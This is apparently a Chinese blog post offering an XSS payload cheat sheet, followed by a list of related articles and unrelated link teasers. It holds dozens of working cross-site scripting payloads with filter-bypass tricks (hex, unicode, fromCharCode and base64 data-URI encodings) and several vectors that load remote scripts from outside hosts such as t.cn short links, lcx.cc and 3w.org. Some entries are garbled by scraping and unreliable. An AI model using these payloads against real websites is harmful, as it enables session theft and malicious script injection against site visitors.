Web安全--XSS模版
【XSS基本探测pyload】
<script>alert(“xss”)</script> <script>alert(/xss/)</script> //双引号换成斜杠 <script>alert(‘xss’)</script> //用单引号 <script>alert("xss");</script> //用分号 <script>alert('xss');</script> <script>alert(/xss/);</script> <script>alert("jdq") //自动补全 <script>alert("xss");;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;</script> //用分号 <script>alert("xss");;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;</script> //空格+分号 <script>alert("xss");;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;</script> //换行符 <script>alert("xss");;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;</script> //回车
单引号被过滤 <script>alert(/jdq/)</script> //用双引号会把引号内的内容单独作为内容 用斜杠,则会连斜杠一起回显
【javascript伪协议】回旋 <a href="javascript:alert(/test/)">xss</a>
<script>被过滤↓ <iframe src=javascript:alert( width= /><iframe>利用iframe框架标签
alert被过滤 <img src=" onerror=eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")></img>
【img标记】 <img src=x onerror=s=createElement('script');body.appendChild(s);s.src='http://t.cn/R5UpyOt';>
on事件点击触发 onclick="alert('xss') //注意要用单引号 双引号不会触发
on事件-移动触发 Onmousemove="alert('xss')
【利用函数加密】 eval 函数配合编码 <script>eval(“js+16进制加密”)</script> <script>eval("\x61\x6c\x65\x72\x74\x28\x22\x78\x73\x73\x22\x29")</script> 编码要执行的语句↓ Alert(“xss”)
【unicode加密】 <script>eval("unicode加密")</script> //js unicode加密 解决alert()被过滤 <script>eval("\u0061\u006c\u0065\u0072\u0074\u0028\u0022\u0078\u0073\u0073\u0022\u0029")</script> 格式↓ 标记eval(“编码”) 结束标记
【String.fromCharCod函数】 String.fromCharCode需要配合eval来实现, 构造 <script>eval(String.fromCharCode(,,,,,,,,,,,,))</script> eval内容加引号相当于正常js语句来执行 不加引号,则是默认作为eval的其他参数语句来执 固定格式→<script>eval(String.fromCharCode编码内容))</script>
【data协议运用】 <object data="data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovL3QuY24vUnE5bjZ6dT48L3NjcmlwdD4="></object> 格式 Data:[<mime type>][;charset=<charset>[;base64],<encoded data> Data //协议 <mime type> //数据类似 charset=<charset> //指定编码 [;base64] //被指定的编码 <encoded data> //定义data协议的编码 实际编码↓ <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4="></object> base64编码要执行的内容 特点:不支持IE
【各标签实战pyload】
——————————————————-xss其他标签下的js用法总结大全––——————————–————————————
<img src=javascript:document.write('<scr'+'ipt src=\'http://www.baidu.com/1.txt\'></scr'+'ipt>')></img> //仅支持IE6 <img src=javascript:window.s=document.createElement('script');window.s.src='http://lcx.cc/1.js';document.body.appendChild(window.s);></img> //仅支持IE6 <img src="pdpdp.gif"></img> //通杀所有浏览器 能触发xss <img src="pdpdp.gif"></img> //通杀所有浏览器 能触发xss <img src=x onerror=document.body.appendChild(document.createElement("scr"+"ipt")).src="http://www.baidu.com"> <input autofocus="bbbb" /> <object data="data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovL3QuY24vUkd1V0REUz48L3NjcmlwdD4="></object> <iframe width="0px" height="0px" src="data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovL3QuY24vUkd1V0REUz48L3NjcmlwdD4="></iframe> ie不支持 <a href="data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovL3d3dy5wb29qeC5jb20vMS5qcz48L3NjcmlwdD4=">sb</a> <anchor>、<img>(不执行js) <a>(需点击) <meta>..... <anchor onload=document.body.appendChild(document.createElement("scr"+"ipt")).src="http://www.baidu.com"> <svg onload=document.body.appendChild(document.CReateElement("scr"+"ipt")).src="http://www.baidu.com"> <svg onload=document.write(String.fromCharCode(,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,))> <baa id=> ()普通的XSS JavaScript注入 <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT> ()IMG标签XSS使用JavaScript命令 <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT> ()IMG标签无分号无引号 <IMG SRC=javascript:alert(‘XSS’)> ()IMG标签大小写不敏感 <IMG SRC=JaVaScRiPt:alert(‘XSS’)> ()HTML编码(必须有分号) <IMG SRC=javascript:alert(“XSS”)> ()修正缺陷IMG标签 <IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”> ()formCharCode标签 <IMG SRC=javascript:alert(String.fromCharCode(,,))> ()UTF-8的Unicode编码 <IMG SRC=jav..省略..S')> ()7位的UTF-8的Unicode编码是没有分号的 <IMG SRC=jav..省略..S')> ()十六进制编码也是没有分号 <IMG SRC=\'#\'" /span> ()嵌入式标签,将Javascript分开 <IMG SRC=\'#\'" ascript:alert(‘XSS’);”> ()嵌入式编码标签,将Javascript分开 <IMG SRC=\'#\'" ascript:alert(‘XSS’);”> ()嵌入式换行符 <IMG SRC=\'#\'" ascript:alert(‘XSS’);”> ()嵌入式回车 <IMG SRC=\'#\'" ascript:alert(‘XSS’);”> ()嵌入式多行注入JavaScript,这是XSS极端的例子 <IMG SRC=\'#\'" /span> ()解决限制字符(要求同页面) <script>z=’document.’</script> <script>z=z+’write(“‘</script> <script>z=z+’<script’</script> <script>z=z+’ src=ht’</script> <script>z=z+’tp://ww’</script> <script>z=z+’w.shell’</script> <script>z=z+’.net/.’</script> <script>z=z+’js></sc’</script> <script>z=z+’ript>”)’</script> <script>eval_r(z)</script> ()空字符 perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out ()空字符2,空字符在国内基本没效果.因为没有地方可以利用 perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out ()Spaces和meta前的IMG标签 <IMG SRC=\'#\'" javascript:alert(‘XSS’);”> ()Non-alpha-non-digit XSS <SCRIPT/XSS SRC=\'#\'" /span>[url=http://3w.org/XSS/xss.js]http://3w.org/XSS/xss.js[/url]”></SCRIPT> ()Non-alpha-non-digit XSS to <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)> ()Non-alpha-non-digit XSS to <SCRIPT/SRC=\'#\'" /span>[url=http://3w.org/XSS/xss.js]http://3w.org/XSS/xss.js[/url]”></SCRIPT> ()双开括号 <<SCRIPT>alert(“XSS”);//<</SCRIPT> ()无结束脚本标记(仅火狐等浏览器) <SCRIPT SRC=http://3w.org/XSS/xss.js?<B> ()无结束脚本标记2 <SCRIPT SRC=//3w.org/XSS/xss.js> ()半开的HTML/JavaScript XSS <IMG SRC=\'#\'" /span> ()双开角括号 <iframe src=http://3w.org/XSS.html < ()无单引号 双引号 分号 <SCRIPT>a=/XSS/ alert(a.source)</SCRIPT> ()换码过滤的JavaScript \”;alert(‘XSS’);// ()结束Title标签 </TITLE><SCRIPT>alert(“XSS”);</SCRIPT> ()Input Image <INPUT SRC=\'#\'" /span> ()BODY Image <BODY BACKGROUND=”javascript:alert(‘XSS’)”> ()BODY标签 <BODY(‘XSS’)> ()IMG Dynsrc <IMG DYNSRC=\'#\'" /span> ()IMG Lowsrc <IMG LOWSRC=\'#\'" /span> ()BGSOUND <BGSOUND SRC=\'#\'" /span> ()STYLE sheet <LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”> ()远程样式表 <LINK REL=”stylesheet” HREF=”[url=http://3w.org/xss.css]http://3w.org/xss.css[/url]”> ()List-style-image(列表式) <STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS ()IMG VBscript <IMG SRC=\'#\'" /STYLE><UL><LI>XSS ()META链接url <META HTTP-EQUIV=”refresh” CONTENT=”; URL=http://;URL=javascript:alert(‘XSS’);”> ()Iframe <IFRAME SRC=\'#\'" /IFRAME> ()Frame <FRAMESET><FRAME SRC=\'#\'" /FRAMESET> ()Table <TABLE BACKGROUND=”javascript:alert(‘XSS’)”> ()TD <TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”> ()DIV background-image <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”> ()DIV background-image后加上额外字符(-&&&&-&&&) <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”> ()DIV expression <DIV STYLE=”width: expression_r(alert(‘XSS’));”> ()STYLE属性分拆表达 <IMG STYLE=”xss:expression_r(alert(‘XSS’))”> ()匿名STYLE(组成:开角号和一个字母开头) <XSS STYLE=”xss:expression_r(alert(‘XSS’))”> ()STYLE background-image <STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A> ()IMG STYLE方式 exppression(alert(“XSS”))’> ()STYLE background <STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE> ()BASE <BASE HREF=”javascript:alert(‘XSS’);//”> ()EMBED标签,你可以嵌入FLASH,其中包涵XSS <EMBED SRC=\'#\'" /span>[flash]http://3w.org/XSS/xss.swf[/flash]” ></EMBED>
Web安全--XSS模版的更多相关文章
- Web安全XSS
Web安全XSS 简单的反射型XSS钓鱼演示 </form> <script> function hack(){ XSSImage=new Image; XSSImage.sr ...
- web安全-xss攻击
web安全问题 xss攻击 1.html标签 html内容的转义 escapeHtml str = str.replace(/&/g,'&'); str = str.replac ...
- web 安全 & web 攻防: XSS(跨站脚本攻击)和 CSRF(跨站请求伪造)
web 安全 & web 攻防: XSS(跨站脚本攻击)和 CSRF(跨站请求伪造) XSS(跨站脚本攻击)和CSRF(跨站请求伪造) Cross-site Scripting (XSS) h ...
- WEB安全----XSS和CSRF
随着Web2.0.社交网络.微博等等一系列新型的互联网产品的诞生,基于Web环境的互联网应用越来越广泛,企业信息化的过程中各种应用都架设在Web平台上,Web业务的迅速发展也引起黑客们的强烈关注,接踵 ...
- Web安全--XSS现代WAF规则探测及绕过技术
XSS现代WAF规则探测及绕过技术初始测试 1.使用无害的payload,类似<b>,<i>,<u>观察响应,判断应用程序是否被HTML编码,是否标签被过滤,是否过 ...
- MVC WEB安全——XSS攻击防御
XSS(跨站脚本攻击) 描述: 原理:攻击者往Web页面里插入恶意代码,当用户浏览该页之时,嵌入其中Web里面的代码会被执行,从而达到攻击用户的特殊目的. 类别: 1)被动注入(Passive Inj ...
- 小白日记49:kali渗透测试之Web渗透-XSS(三)-存储型XSS、DOM型XSS、神器BEFF
存储型XSS与DOM型XSS [XSS原理] 存储型XSS 1.可长期存储于服务器端 2.每次用户访问都会被执行js脚本,攻击者只需侦听指定端口 #攻击利用方法大体等于反射型xss利用 ##多出现在留 ...
- 小白日记47:kali渗透测试之Web渗透-XSS(一)
XSS [推荐书籍:XSS跨站脚本攻击剖析与防御] xss表示Cross Site Scripting(跨站脚本攻击),它与SQL注入攻击类似,SQL注入攻击中以SQL语句作为用户输入,从而达到查询/ ...
- web安全-XSS攻击及防御
XSS攻击的原理 xss表示Cross Site Scripting(跨站脚本攻击),它与SQL注入攻击类似,SQL注入攻击中以SQL语句作为用户输入,从而达到查询/修改/删除数据的目的,而在xss攻 ...
随机推荐
- LeetCode132:Palindrome Partitioning II
题目: Given a string s, partition s such that every substring of the partition is a palindrome. Return ...
- 通过代码的方式完成WCF服务的寄宿工作
使用纯代码的方式进行服务寄宿 服务寄宿的目的是为了开启一个进程,为WCF服务提供一个运行的环境.通过为服务添加一个或者多个终结点,使之暴露给潜在的服务消费,服务消费者通过匹配的终结点对该服务进行调用, ...
- java判定字符串中仅有数字和- 正则表达式匹配 *** 最爱那水货
1.当有其他字符出现时,返回的数组长度>1 String s = "3---6\\5656"; Pattern pattern = Pattern.compil ...
- Oracle 中 call 和 exec的区别
今天发现了一个小东西,觉得很有意思,查找了一些资料,跟大家分享一下: 在sqlplus中: 在第三方提供的工具(如:plsqldev) 总结: exec是sqlplus的命令,只能在sqlplus中使 ...
- 帝吧出征FB:这李毅吧的“爆吧”文化是如何形成的
声明:本文不对爆吧行为及其涉及的事件进行是非判断,只探讨帝吧文化本身,欢迎拍砖.更正和补充. 一.“帝吧FB出征”事件梳理 继上次全网集体骂 “薯片”事件后,昨日(1月20日)晚7点,又发生了一次互联 ...
- 详解JavaScript函数模式
JavaScript设计模式的作用是提高代码的重用性,可读性,使代码更容易的维护和扩展.在javascript中,函数是一类对象,这表示他可以作为参数传递给其他函数:此外,函数还可以提供作用域. 创建 ...
- MapGIS转Shp文件的单位问题
在MapGIS浏览查看一下数据,各种不习惯:用mapgis自带的转shp功能,属性表会出错:利用名为map2shp的试用版软件可将mapgis格式的数据较为良好转成shp格式.但经常会遇到一个单位问题 ...
- 关于Fragment 不响应onActivityResult的情况分析 (
大家都知道,可以通过使用 startActivityForResult() 和 onActivityResult() 方法来传递或接收参数. 但你是否遭遇过onActivityResult()不执行或 ...
- HBase权威指南环境配置
出处:http://wuyudong.com/1958.html 系统采用ubuntu-14.04,64bit 1.安装git sudo apt-get install git 出现下面错误:Err ...
- Silverlight项目笔记5:Oracle归档模式引起的异常&&表格控件绑定按钮
1.Oracle归档模式产生日志文件引起数据库异常 连接数据库失败,提示监听错误,各种检查监听配置文件,删除再添加监听,无果. sqlplus下重启数据库数据库依然无果,期间碰到多个错误提示: ORA ...